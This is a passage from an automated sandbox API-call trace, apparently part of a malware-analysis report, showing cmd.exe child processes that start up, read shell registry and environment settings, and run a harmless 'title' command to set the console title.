GetProcessHeap () returned 0x2b0000 [0046.567] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xae8) returned 0x2c9620 [0046.567] FreeEnvironmentStringsW (penv=0x2c8b30) returned 1 [0046.567] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49eec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.567] GetProcessHeap () returned 0x2b0000 [0046.567] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cae20 | out: hHeap=0x2b0000) returned 1 [0046.567] GetProcessHeap () returned 0x2b0000 [0046.567] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4016) returned 0x2cae20 [0046.568] GetProcessHeap () returned 0x2b0000 [0046.568] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x34) returned 0x2c65d0 [0046.568] GetProcessHeap () returned 0x2b0000 [0046.568] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cae20 | out: hHeap=0x2b0000) returned 1 [0046.568] GetConsoleOutputCP () returned 0x1b5 [0046.568] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0046.568] GetUserDefaultLCID () returned 0x409 [0046.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ee7b50, cchData=8 | out: lpLCData=":") returned 2 [0046.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f4c0, cchData=128 | out: lpLCData="0") returned 2 [0046.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f4c0, cchData=128 | out: lpLCData="0") returned 2 [0046.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f4c0, cchData=128 | out: lpLCData="1") returned 2 [0046.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49efa740, cchData=8 | out: lpLCData="/") returned 2 [0046.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49efa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0046.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49efa460, cchData=32 | out: lpLCData="Tue") returned 4 [0046.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49efa420, cchData=32 | out: lpLCData="Wed") returned 4 [0046.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49efa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0046.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49efa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0046.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49efa360, cchData=32 | out: lpLCData="Sat") returned 4 [0046.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49efa700, cchData=32 | out: lpLCData="Sun") returned 4 [0046.569] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ee7b40, cchData=8 | out: lpLCData=".") returned 2 [0046.569] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49efa4e0, cchData=8 | out: lpLCData=",") returned 2 [0046.569] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0046.570] GetProcessHeap () returned 0x2b0000 [0046.570] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20c) returned 0x2c8ba0 [0046.570] GetConsoleTitleW (in: lpConsoleTitle=0x2c8ba0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.570] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f20000 [0046.570] GetProcAddress (hModule=0x76f20000, lpProcName="CopyFileExW") returned 0x76f323d0 [0046.570] GetProcAddress (hModule=0x76f20000, lpProcName="IsDebuggerPresent") returned 0x76f28290 [0046.570] GetProcAddress (hModule=0x76f20000, lpProcName="SetConsoleInputExeNameW") returned 0x76f317e0 [0046.571] GetProcessHeap () returned 0x2b0000 [0046.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4012) returned 0x2cae20 [0046.571] GetProcessHeap () returned 0x2b0000 [0046.571] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cae20 | out: hHeap=0x2b0000) returned 1 [0046.571] _wcsicmp (_String1="title", _String2=")") returned 75 [0046.571] _wcsicmp (_String1="FOR", _String2="title") returned -14 [0046.571] _wcsicmp (_String1="FOR/?", _String2="title") returned -14 [0046.571] _wcsicmp (_String1="IF", _String2="title") returned -11 [0046.571] _wcsicmp (_String1="IF/?", _String2="title") returned -11 [0046.571] _wcsicmp (_String1="REM", _String2="title") returned -2 [0046.571] _wcsicmp (_String1="REM/?", _String2="title") returned -2 [0046.571] GetProcessHeap () returned 0x2b0000 [0046.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xb0) returned 0x2c8dc0 [0046.571] GetProcessHeap () returned 0x2b0000 [0046.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1c) returned 0x2c4650 [0046.572] GetProcessHeap () returned 0x2b0000 [0046.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x22) returned 0x2c4680 [0046.573] GetConsoleTitleW (in: lpConsoleTitle=0x16f3d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.573] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0046.573] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0046.573] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0046.573] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0046.573] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0046.573] _wcsicmp (_String1="title", _String2="CD") returned 17 [0046.573] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0046.573] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0046.573] _wcsicmp (_String1="title", _String2="REN") returned 2 [0046.573] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0046.573] _wcsicmp (_String1="title", _String2="SET") returned 1 [0046.573] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0046.573] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0046.573] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0046.573] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0046.573] _wcsicmp (_String1="title", _String2="MD") returned 7 [0046.573] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0046.573] _wcsicmp (_String1="title", _String2="RD") returned 2 [0046.573] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0046.573] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0046.573] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0046.573] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0046.573] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0046.573] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0046.573] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0046.573] _wcsicmp (_String1="title", _String2="VER") returned -2 [0046.574] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0046.574] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0046.574] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0046.574] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0046.574] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0046.574] GetProcessHeap () returned 0x2b0000 [0046.574] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x34) returned 0x2c6610 [0046.574] GetProcessHeap () returned 0x2b0000 [0046.574] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6610, Size=0x22) returned 0x2c46b0 [0046.574] GetProcessHeap () returned 0x2b0000 [0046.574] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2c46b0) returned 0x22 [0046.574] GetProcessHeap () returned 0x2b0000 [0046.574] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2e) returned 0x2c6610 [0046.574] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x16ef10 | out: TokenHandle=0x16ef10*=0x0) returned 0xc000007c [0046.574] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x16ef10 | out: TokenHandle=0x16ef10*=0x4c) returned 0x0 [0046.574] NtQueryInformationToken (in: TokenHandle=0x4c, TokenInformationClass=0x12, TokenInformation=0x16ef20, TokenInformationLength=0x4, ReturnLength=0x16ef28 | out: TokenInformation=0x16ef20, ReturnLength=0x16ef28) returned 0x0 [0046.575] NtQueryInformationToken (in: TokenHandle=0x4c, TokenInformationClass=0x1a, TokenInformation=0x16ef28, TokenInformationLength=0x4, ReturnLength=0x16ef20 | out: TokenInformation=0x16ef28, ReturnLength=0x16ef20) returned 0x0 [0046.575] NtClose (Handle=0x4c) returned 0x0 [0046.575] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x16eef0, nSize=0x0, Arguments=0x16eef8 | out: lpBuffer="躀,") returned 0xf [0046.575] GetProcessHeap () returned 0x2b0000 [0046.575] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x218) returned 0x2c8eb0 [0046.575] SetConsoleTitleW (lpConsoleTitle="Administrator: 6037086") returned 1 [0046.576] GetProcessHeap () returned 0x2b0000 [0046.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb0 | out: hHeap=0x2b0000) returned 1 [0046.576] LocalFree (hMem=0x2c8e80) returned 0x0 [0046.576] _get_osfhandle (_FileHandle=1) returned 0x5c [0046.576] SetConsoleMode (hConsoleHandle=0x5c, dwMode=0x0) returned 0 [0046.576] _get_osfhandle (_FileHandle=1) returned 0x5c [0046.576] GetConsoleMode (in: hConsoleHandle=0x5c, lpMode=0x49ede194 | out: lpMode=0x49ede194) returned 0 [0046.576] _get_osfhandle (_FileHandle=0) returned 0x3 [0046.576] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ede198 | out: lpMode=0x49ede198) returned 1 [0046.576] SetConsoleInputExeNameW () returned 0x1 [0046.576] GetConsoleOutputCP () returned 0x1b5 [0046.576] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0046.577] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0046.577] exit (_Code=0) Process: id = "9" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x1eb1e000" os_pid = "0x15c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xb54" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" title 6881369\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 19 os_tid = 0x248 [0046.400] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fbf0 | out: lpSystemTimeAsFileTime=0x22fbf0*(dwLowDateTime=0x1a8ac4c0, dwHighDateTime=0x1d5e3d9)) [0046.400] GetCurrentProcessId () returned 0x15c [0046.400] GetCurrentThreadId () returned 0x248 [0046.400] GetTickCount () returned 0x11565b6 [0046.400] QueryPerformanceCounter (in: lpPerformanceCount=0x22fbf8 | out: lpPerformanceCount=0x22fbf8*=18832248413) returned 1 [0046.402] GetModuleHandleW (lpModuleName=0x0) returned 0x49eb0000 [0046.582] __set_app_type (_Type=0x1) [0046.582] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ed7810) returned 0x0 [0046.582] __getmainargs (in: _Argc=0x49efa608, _Argv=0x49efa618, _Env=0x49efa610, _DoWildCard=0, _StartInfo=0x49ede0f4 | out: _Argc=0x49efa608, _Argv=0x49efa618, _Env=0x49efa610) returned 0 [0046.582] GetCurrentThreadId () returned 0x248 [0046.582] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x248) returned 0x38 [0046.582] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f20000 [0046.582] GetProcAddress (hModule=0x76f20000, lpProcName="SetThreadUILanguage") returned 0x76f36d40 [0046.582] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0046.583] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0046.583] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fb88 | out: phkResult=0x22fb88*=0x0) returned 0x2 [0046.583] VirtualQuery (in: lpAddress=0x22fb70, lpBuffer=0x22faf0, dwLength=0x30 | out: lpBuffer=0x22faf0*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.583] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22faf0, dwLength=0x30 | out: lpBuffer=0x22faf0*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.583] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22faf0, dwLength=0x30 | out: lpBuffer=0x22faf0*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.583] VirtualQuery (in: lpAddress=0x134000, lpBuffer=0x22faf0, dwLength=0x30 | out: lpBuffer=0x22faf0*(BaseAddress=0x134000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.583] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22faf0, dwLength=0x30 | out: lpBuffer=0x22faf0*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.583] GetConsoleOutputCP () returned 0x1b5 [0046.583] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0046.584] SetConsoleCtrlHandler (HandlerRoutine=0x49ed3184, Add=1) returned 1 [0046.584] _get_osfhandle (_FileHandle=1) returned 0x5c [0046.584] SetConsoleMode (hConsoleHandle=0x5c, dwMode=0x0) returned 0 [0046.584] _get_osfhandle (_FileHandle=1) returned 0x5c [0046.584] GetConsoleMode (in: hConsoleHandle=0x5c, lpMode=0x49ede194 | out: lpMode=0x49ede194) returned 0 [0046.584] _get_osfhandle (_FileHandle=0) returned 0x3 [0046.584] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ede198 | out: lpMode=0x49ede198) returned 1 [0046.584] GetEnvironmentStringsW () returned 0x3c8b30* [0046.584] GetProcessHeap () returned 0x3b0000 [0046.584] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xae8) returned 0x3c9620 [0046.584] FreeEnvironmentStringsW (penv=0x3c8b30) returned 1 [0046.584] GetProcessHeap () returned 0x3b0000 [0046.584] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x8) returned 0x3c83b0 [0046.585] GetEnvironmentStringsW () returned 0x3c8b30* [0046.585] GetProcessHeap () returned 0x3b0000 [0046.585] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xae8) returned 0x3ca110 [0046.585] FreeEnvironmentStringsW (penv=0x3c8b30) returned 1 [0046.585] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea48 | out: phkResult=0x22ea48*=0x40) returned 0x0 [0046.585] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea40, lpData=0x22ea60, lpcbData=0x22ea44*=0x1000 | out: lpType=0x22ea40*=0x0, lpData=0x22ea60*=0x18, lpcbData=0x22ea44*=0x1000) returned 0x2 [0046.585] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea40, lpData=0x22ea60, lpcbData=0x22ea44*=0x1000 | out: lpType=0x22ea40*=0x4, lpData=0x22ea60*=0x1, lpcbData=0x22ea44*=0x4) returned 0x0 [0046.585] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea40, lpData=0x22ea60, lpcbData=0x22ea44*=0x1000 | out: lpType=0x22ea40*=0x0, lpData=0x22ea60*=0x1, lpcbData=0x22ea44*=0x1000) returned 0x2 [0046.585] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea40, lpData=0x22ea60, lpcbData=0x22ea44*=0x1000 | out: lpType=0x22ea40*=0x4, lpData=0x22ea60*=0x0, lpcbData=0x22ea44*=0x4) returned 0x0 [0046.585] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea40, lpData=0x22ea60, lpcbData=0x22ea44*=0x1000 | out: lpType=0x22ea40*=0x4, lpData=0x22ea60*=0x40, lpcbData=0x22ea44*=0x4) returned 0x0 [0046.585] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea40, lpData=0x22ea60, lpcbData=0x22ea44*=0x1000 | out: lpType=0x22ea40*=0x4, lpData=0x22ea60*=0x40, lpcbData=0x22ea44*=0x4) returned 0x0 [0046.585] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea40, lpData=0x22ea60, lpcbData=0x22ea44*=0x1000 | out: lpType=0x22ea40*=0x0, lpData=0x22ea60*=0x40, lpcbData=0x22ea44*=0x1000) returned 0x2 [0046.585] RegCloseKey (hKey=0x40) returned 0x0 [0046.585] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea48 | out: phkResult=0x22ea48*=0x40) returned 0x0 [0046.585] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea40, lpData=0x22ea60, lpcbData=0x22ea44*=0x1000 | out: lpType=0x22ea40*=0x0, lpData=0x22ea60*=0x40, lpcbData=0x22ea44*=0x1000) returned 0x2 [0046.585] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea40, lpData=0x22ea60, lpcbData=0x22ea44*=0x1000 | out: lpType=0x22ea40*=0x4, lpData=0x22ea60*=0x1, lpcbData=0x22ea44*=0x4) returned 0x0 [0046.585] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea40, lpData=0x22ea60, lpcbData=0x22ea44*=0x1000 | out: lpType=0x22ea40*=0x0, lpData=0x22ea60*=0x1, lpcbData=0x22ea44*=0x1000) returned 0x2 [0046.585] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea40, lpData=0x22ea60, lpcbData=0x22ea44*=0x1000 | out: lpType=0x22ea40*=0x4, lpData=0x22ea60*=0x0, lpcbData=0x22ea44*=0x4) returned 0x0 [0046.585] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea40, lpData=0x22ea60, lpcbData=0x22ea44*=0x1000 | out: lpType=0x22ea40*=0x4, lpData=0x22ea60*=0x9, lpcbData=0x22ea44*=0x4) returned 0x0 [0046.585] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea40, lpData=0x22ea60, lpcbData=0x22ea44*=0x1000 | out: lpType=0x22ea40*=0x4, lpData=0x22ea60*=0x9, lpcbData=0x22ea44*=0x4) returned 0x0 [0046.585] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea40, lpData=0x22ea60, lpcbData=0x22ea44*=0x1000 | out: lpType=0x22ea40*=0x0, lpData=0x22ea60*=0x9, lpcbData=0x22ea44*=0x1000) returned 0x2 [0046.585] RegCloseKey (hKey=0x40) returned 0x0 [0046.586] time (in: timer=0x0 | out: timer=0x0) returned 0x5e47aa57 [0046.586] srand (_Seed=0x5e47aa57) [0046.586] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 6881369\"" [0046.586] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 6881369\"" [0046.586] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49eec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.586] GetProcessHeap () returned 0x3b0000 [0046.586] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x218) returned 0x3cac00 [0046.586] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3cac10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0046.586] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0046.586] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.586] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0046.586] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.586] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0046.586] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0046.586] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0046.586] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0046.586] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0046.586] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0046.586] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0046.586] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0046.586] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0046.587] GetProcessHeap () returned 0x3b0000 [0046.587] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x5c) returned 0x3cae20 [0046.587] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f850 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.587] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x22f850, lpFilePart=0x22f830 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x22f830*="Desktop") returned 0x25 [0046.587] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0046.587] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f560 | out: lpFindFileData=0x22f560*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3c8990 [0046.587] FindClose (in: hFindFile=0x3c8990 | out: hFindFile=0x3c8990) returned 1 [0046.587] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x22f560 | out: lpFindFileData=0x22f560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3c8990 [0046.587] FindClose (in: hFindFile=0x3c8990 | out: hFindFile=0x3c8990) returned 1 [0046.587] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0046.587] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x22f560 | out: lpFindFileData=0x22f560*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x13408ec0, ftLastAccessTime.dwHighDateTime=0x1d5e3d9, ftLastWriteTime.dwLowDateTime=0x13408ec0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3c8990 [0046.587] FindClose (in: hFindFile=0x3c8990 | out: hFindFile=0x3c8990) returned 1 [0046.587] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0046.587] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0046.587] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0046.587] GetProcessHeap () returned 0x3b0000 [0046.587] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c9620 | out: hHeap=0x3b0000) returned 1 [0046.588] GetEnvironmentStringsW () returned 0x3c8b30* [0046.588] GetProcessHeap () returned 0x3b0000 [0046.588] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xae8) returned 0x3c9620 [0046.588] FreeEnvironmentStringsW (penv=0x3c8b30) returned 1 [0046.588] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49eec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.588] GetProcessHeap () returned 0x3b0000 [0046.588] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cae20 | out: hHeap=0x3b0000) returned 1 [0046.588] GetProcessHeap () returned 0x3b0000 [0046.588] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x4016) returned 0x3cae20 [0046.588] GetProcessHeap () returned 0x3b0000 [0046.588] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x34) returned 0x3c65d0 [0046.588] GetProcessHeap () returned 0x3b0000 [0046.588] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cae20 | out: hHeap=0x3b0000) returned 1 [0046.588] GetConsoleOutputCP () returned 0x1b5 [0046.589] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0046.589] GetUserDefaultLCID () returned 0x409 [0046.589] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, 